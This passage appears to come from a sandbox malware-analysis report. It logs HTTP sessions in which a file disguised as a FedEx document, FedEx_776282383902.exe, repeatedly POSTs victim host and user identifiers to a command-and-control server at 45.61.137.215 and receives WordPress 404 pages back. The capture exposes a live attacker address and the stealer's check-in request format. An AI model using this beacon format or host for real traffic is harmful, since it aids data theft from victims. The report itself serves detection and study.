» Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:27.002008915 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 22, 2024 22:02:27.004405022 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 22, 2024 22:02:27.007061958 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 22, 2024 22:02:27.007077932 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 22, 2024 22:02:27.007083893 CEST	1236	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 22, 2024 22:02:27.011996984 CEST	1236	IN	Data Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
May 22, 2024 22:02:27.014540911 CEST	1236	IN	Data Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
May 22, 2024 22:02:27.016587973 CEST	1236	IN	Data Raw: 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d Data Ascii: nous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--c
May 22, 2024 22:02:27.016601086 CEST	108	IN	Data Raw: 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f Data Ascii: has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49725	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:27.150657892 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:27.204291105 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:30.365586996 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:27 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:30.366506100 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:30.368565083 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:30.370723963 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:30.370743036 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:30.374875069 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:30.377001047 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:02:30.377017021 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:02:30.378674030 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:02:30.378686905 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49726	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:30.532618999 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:30.580045938 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:33.567181110 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:31 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:33.567251921 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:33.568641901 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:33.568655968 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:33.572108030 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:33.573914051 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:02:33.573929071 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:02:33.577372074 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 22, 2024 22:02:33.577387094 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 22, 2024 22:02:33.580835104 CEST	1236	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49727	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:33.749821901 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:33.797142982 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:36.777962923 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:34 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 